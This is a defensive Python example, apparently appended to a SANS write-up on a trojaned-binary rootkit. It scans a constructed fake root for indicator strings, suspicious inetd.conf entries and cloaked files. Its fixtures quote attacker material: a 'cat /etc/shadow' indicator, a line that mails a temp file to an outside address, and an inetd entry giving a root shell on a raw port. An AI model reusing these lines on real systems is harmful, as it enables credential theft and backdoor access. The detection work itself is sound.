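(Editor's added example, not John Ferriby's code and not part of the adore kit.) The strings output above gives three things a responder can turn into checks: the marker text the trojaned utilities carry, the inetd.conf line the embedded script appends (a raw port number, running as root, via tcpd, whose "server" is a copy of /bin/sh named /bin/support with the setuid bit added), and the cloaking the poster found by hand when `ls /usr/sbin/k*` returned nothing but `ls /usr/sbin/kernel.pl` did. The script below runs all three against a constructed fake root directory: the indicator strings are copied from the strings output above, the fake binaries and inetd.conf are mine, and the "hidden listdir" simulates the kernel module filtering directory reads. Everything about the fixture is an assumption for illustration. On a real case run this from a known-good boot medium against the mounted disk: on the live box the kernel module filters what getdents returns, so the cloaking check only works when the directory listing comes from a trusted kernel and the expected names come from a trusted source such as a package manifest.

```python
"""Checks for the trojaned-binary pattern described in the post above.

Added example, not the poster's code. It exercises three checks against a
constructed fake root directory:
  1. strings-style indicator scan (indicators copied from the post's strings output),
  2. inetd.conf review: raw-port services, root services outside the usual daemon
     directories, and a server binary that is byte-for-byte a copy of /bin/sh,
  3. the cloaking check the poster did by hand: names that stat() finds but the
     directory listing omits (only meaningful with a trusted kernel and listing).
"""
import hashlib
import os
import stat
import tempfile
from pathlib import Path

IOC_STRINGS = [b"And the lair is open...", b"gushlair@", b"/tmp/.mailtmp",
               b"/bin/support", b"GRK1BD", b"cat /etc/shadow"]


def scan_tree(root: Path, iocs=IOC_STRINGS) -> dict:
    """Map relative path -> indicator strings found inside the file (like strings | grep)."""
    hits = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            found = [s.decode() for s in iocs if s in p.read_bytes()]
            if found:
                hits[str(p.relative_to(root))] = found
    return hits


def sha256(p: Path) -> str:
    return hashlib.sha256(p.read_bytes()).hexdigest()


def inetd_findings(conf_text: str, root: Path, shell_hashes: set) -> list:
    """Heuristic review of inetd.conf entries; 'root' is the filesystem being examined."""
    findings = []
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            continue
        service, _socktype, _proto, _wait, user, server, *args = fields
        prog = server
        if os.path.basename(server) == "tcpd" and args:
            prog = args[0]                   # tcpd execs the program named in its first argument
        if not prog.startswith("/"):
            prog = "/usr/sbin/" + prog       # tcpd's default server directory
        reasons = []
        if service.isdigit():
            reasons.append("service is a raw port number, not a name from /etc/services")
        if user.split(".")[0] == "root" and not prog.startswith(("/usr/sbin/", "/usr/libexec/")):
            reasons.append("runs as root from outside the usual daemon directories")
        target = root / prog.lstrip("/")
        if target.is_file():
            if sha256(target) in shell_hashes:
                reasons.append("server binary is a copy of a shell")
            if target.stat().st_mode & (stat.S_ISUID | stat.S_ISGID):
                reasons.append("server binary is setuid/setgid")
        if reasons:
            findings.append({"service": service, "program": prog, "reasons": reasons})
    return findings


def find_cloaked(directory: Path, expected_names, listdir=os.listdir) -> list:
    """Names that exist (stat succeeds) but that the directory listing does not return."""
    visible = set(listdir(directory))
    return sorted(n for n in expected_names if (directory / n).exists() and n not in visible)


def demo() -> dict:
    """Build a constructed fake root and run all three checks against it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "usr/sbin").mkdir(parents=True)
        shell = b"\x7fELF fake shell body"            # constructed stand-in for /bin/sh
        (root / "bin/sh").write_bytes(shell)
        (root / "bin/support").write_bytes(shell)     # 'cp -f /bin/sh /bin/support' from the embedded script
        (root / "usr/sbin/in.telnetd").write_bytes(b"\x7fELF telnetd")
        (root / "usr/sbin/kernel.pl").write_bytes(b"#!/usr/bin/perl\n# udp shell stand-in\n")
        # a trojaned utility: legitimate strings plus the attacker's embedded script
        (root / "bin/touch").write_bytes(
            b"\x7fELF GNU fileutils touch\n      And the lair is open...\n"
            b"cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com\n")
        conf = ("telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd\n"
                "1529 stream tcp nowait root /usr/sbin/tcpd /bin/support -i\n")
        shell_hashes = {sha256(root / "bin/sh")}
        # simulate a hooked getdents: the listing omits kernel.pl although the file is there
        hidden_listdir = lambda d: [n for n in os.listdir(d) if n != "kernel.pl"]
        return {
            "iocs": scan_tree(root),
            "inetd": inetd_findings(conf, root, shell_hashes),
            "cloaked": find_cloaked(root / "usr/sbin", ["in.telnetd", "kernel.pl", "in.ftpd"],
                                    hidden_listdir),
        }


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

The hash comparison is the useful part of the inetd check: the attacker's script copies /bin/sh to a new name, so the service line looks like an ordinary daemon but the binary behind it is identical to the shell. Extend the `shell_hashes` set with every shell on the box (and, from a known-good package database, the expected hashes of the daemons that should be there) before running it against a real root.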
 

© 2000 SANS Institute